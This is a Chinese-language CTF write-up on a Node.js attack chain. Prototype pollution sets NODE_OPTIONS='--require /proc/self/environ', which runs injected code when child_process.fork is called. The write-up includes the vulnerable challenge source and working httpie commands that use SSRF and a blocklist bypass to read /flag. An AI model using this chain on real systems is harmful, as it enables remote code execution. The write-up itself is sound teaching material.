Node 从8.0 开始支持 NODE_OPTIONS,而 Node 的参数中有一项名为 --require,可以加载执行一段 JavaScript 代码。这就是一切的起源。
ToC
当 NODE_OPTIONS 遇到 fork
我们先来看一下 child_process.fork 的源码:
1function fork(modulePath /* , args, options */) {2 validateString(modulePath, "modulePath");3
4 // Get options and args arguments.5 let execArgv;6 let options = {};7 let args = [];8 let pos = 1;9 if (pos < arguments.length && ArrayIsArray(arguments[pos])) {10 args = arguments[pos++];11 }12
13 if (14 pos < arguments.length &&15 (arguments[pos] === undefined || arguments[pos] === null)16 ) {17 pos++;18 }19
20 if (pos < arguments.length && arguments[pos] != null) {21 if (typeof arguments[pos] !== "object") {22 throw new ERR_INVALID_ARG_VALUE(`arguments[${pos}]`, arguments[pos]);23 }24
25 options = { ...arguments[pos++] };26 }27
28 // Prepare arguments for fork:29 execArgv = options.execArgv || process.execArgv;30
31 if (execArgv === process.execArgv && process._eval != null) {32 const index = execArgv.lastIndexOf(process._eval);33 if (index > 0) {34 // Remove the -e switch to avoid fork bombing ourselves.35 execArgv = execArgv.slice();36 execArgv.splice(index - 1, 2);37 }38 }39
40 args = execArgv.concat([modulePath], args);41
42 if (typeof options.stdio === "string") {43 options.stdio = stdioStringToArray(options.stdio, "ipc");44 } else if (!ArrayIsArray(options.stdio)) {45 // Use a separate fd=3 for the IPC channel. Inherit stdin, stdout,46 // and stderr from the parent if silent isn't set.47 options.stdio = stdioStringToArray(48 options.silent ? "pipe" : "inherit",49 "ipc"50 );51 } else if (!options.stdio.includes("ipc")) {52 throw new ERR_CHILD_PROCESS_IPC_REQUIRED("options.stdio");53 }54
55 options.execPath = options.execPath || process.execPath;56 options.shell = false;57
58 return spawn(options.execPath, args, options);59}看到第 52 行。当 options 中没有 execPath 中,fork 会尝试使用 process.execPath,也就是 node 本身。如果我们还可以控制 options.env,那就可以在 fork 执行之前先执行一段我们想要执行的代码。
原型链注入
原型链注入是老生长谈的 Node 安全漏洞了。这次,我们需要通过它写入 env,以在 fork 时传入环境变量。
通过注入 __proto__.env,向其中写入:
1{2 "NODE_OPTIONS": "--require path/to/file.js"3}我们就可以执行对应的 JavaScript 了。那如果不能借助文件,我们又该怎么办呢?
/proc
通过 /proc/self/environ,我们可以读取当前的环境变量。于是,我们就可以通过将代码写到环境变量里,达到执行任意代码的目的。我们将上面的 payload 修改成下面的形式:
1{2 "AAAA": "console.log("2333")//",3 "NODE_OPTIONS": "--require /proc/self/environ"4}就可以在 fork 之前向控制台打印出 2333 了。这里的 AAAA 是为了让这条环境变量在 /proc/self/environ 中能显示在最前,而后面的 // 则是为了注释掉之后的内容,防止执行出现问题。AAAA 和 // 的配合使得只有我们希望的代码被执行,提高了破坏力。
实战
这题
1const express = require("express");2const bodyParser = require("body-parser");3const proc = require("child_process");4const request = require("request");5const ip = require("ip");6const manage = require("./manage.js");7const path = require("path");8
9const app = express();10app.use(bodyParser.urlencoded({ extended: true }));11app.use(bodyParser.json());12
13app.use(express.static(path.join(__dirname, "public")));14
15//stop hackers16const disallowedKeys = [17 "__proto__",18 "prototype",19 "constructor",20 "eval",21 "proccess",22 "root",23 "global",24 "exec",25 "!",26 "fs",27];28
29function isValidPath(segment) {30 disallowedKeys.forEach(evilWord => {31 if (segment.toString().indexOf(evilWord) !== -1) {32 return false;33 }34 });35
36 return true;37}38
39app.post("/add", (req, res) => {40 let ip = req.ip;41 console.log(ip.m);42 if (ip.substr(0, 7) == "::ffff:") {43 ip = ip.substr(7);44 }45 console.log(`method:${req.method},serverip:${server_ip},ip:${ip}`);46
47 if (ip != "127.0.0.1" && ip != server_ip) {48 res.status(403).send("Not Edit from Local!");49 } else {50 if (req.body.userName && req.body.nameVal) {51 let username = req.body.userName;52 let nameVal = req.body.nameVal;53
54 if (!isValidPath(username) || !isValidPath(nameVal)) {55 username = "username";56 nameVal = "guest";57 }58
59 manage.set(object, username, nameVal);60 console.log(ip.k);61 console.log(object);62
63 res.send(`64 <h1>Edit Success</h1>65 <a href="/admin">View Admin Page</a>`);66 } else {67 res.send("param error");68 }69 }70});71
72app.get("/admin", (req, res) => {73 if (manage.get(object, "username", "guest") === "admin") {74 console.log("Current User:" + object.username);75
76 const child = proc.fork(`${__dirname}/public/user.js`, ["admin"]);77 child.on("message", body => {78 res.status(200).send(body);79 });80 child.on("close", (code, signal) => {81 console.log(`subproccess ended with ${signal}`);82 });83 } else {84 res.status(403).send("Only Admin Can View this");85 }86});87
88app.get("/getContent", (req, res) => {89 res.sendfile(`${__dirname}/public/guest.html`);90});91
92app.get("/", (req, res) => {93 // console.log(req.body)94 let uri = req.query.url ? req.query.url : "http://127.0.0.1:3000/getContent";95 console.log(uri);96
97 try {98 request.get(uri, (err, response, data) => {99 if (!err && response.statusCode == 200) {100 res.send(data);101 } else {102 console.log(err);103 }104 });105 } catch (e) {106 console.log(e);107 } finally {108 console.log("Make Server Continue Running");109 }110});111
112var object = { username: "guest" };113var server_ip = ip.address();114
115app.listen(3002);116console.log(`${server_ip} is starting at port 3000`);1const isObj = require("is-obj");2
3var manage = {4 getPathSegments: function (path) {5 const pathArray = path.split(".");6 const parts = [];7
8 for (let i = 0; i < pathArray.length; i++) {9 let p = pathArray[i];10
11 while (p[p.length - 1] === "\\" && pathArray[i + 1] !== undefined) {12 p = p.slice(0, -1);13 p += pathArray[++i];14 }15
16 parts.push(p);17 }18
19 return parts;20 },21
22 get: function (object, path, value) {23 if (!isObj(object) || typeof path !== "string") {24 return value === undefined ? object : value;25 }26
27 const pathArray = this.getPathSegments(path);28
29 for (let i = 0; i < pathArray.length; i++) {30 if (!Object.prototype.propertyIsEnumerable.call(object, pathArray[i])) {31 return value;32 }33
34 object = object[pathArray[i]];35
36 if (object === undefined || object === null) {37 if (i !== pathArray.length - 1) {38 return value;39 }40 break;41 }42 }43
44 return object;45 },46
47 set: function (object, path, value) {48 Object.keys(Object.prototype).forEach(function (Val) {49 if (!Object.hasOwnProperty(Val)) {50 delete Object.prototype[Val];51 console.log(`${Val} is delete`);52 }53 });54
55 if (!isObj(object) || typeof path !== "string") {56 return object;57 }58
59 const root = object;60 const pathArray = this.getPathSegments(path);61
62 for (let i = 0; i < pathArray.length; i++) {63 const p = pathArray[i];64
65 if (!isObj(object[p])) {66 object[p] = {};67 }68
69 if (i === pathArray.length - 1) {70 object[p] = value;71 }72
73 object = object[p];74 }75
76 return root;77 },78};79
80module.exports = manage;可以看到,manager.js 中 set 存在明显的原型链注入,而通过 getPathSegments 又可以以 \\. 的方式绕过黑名单的检测。
我们发现,修改信息只能通过 /add 进行,这里有一个内网限定访问,可以使用 request 的 har 来实现:
1http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "username", "nameVal": "admin"}' 'url[har][postData][mimeType]'=='application/json'然后执行写入要执行的代码:
1http --follow --timeout 3600 GET challenge-9a9f71099ac1a765.sandbox.ctfhub.com:10080/ 'url[har][method]'=='POST' 'url[har][url]'=='http://127.0.0.1/add' 'url[har][postData][text]'=='{"userName": "__pr\\\\.oto__.env", "nameVal": {"A": "process.send(require('\''child_process'\'').execSync('\''cat /flag'\''))//", "NODE_OPTIONS": "--require /proc/self/environ"}}' 'url[har][postData][mimeType]'=='application/json'最后访问 /admin 就可以了。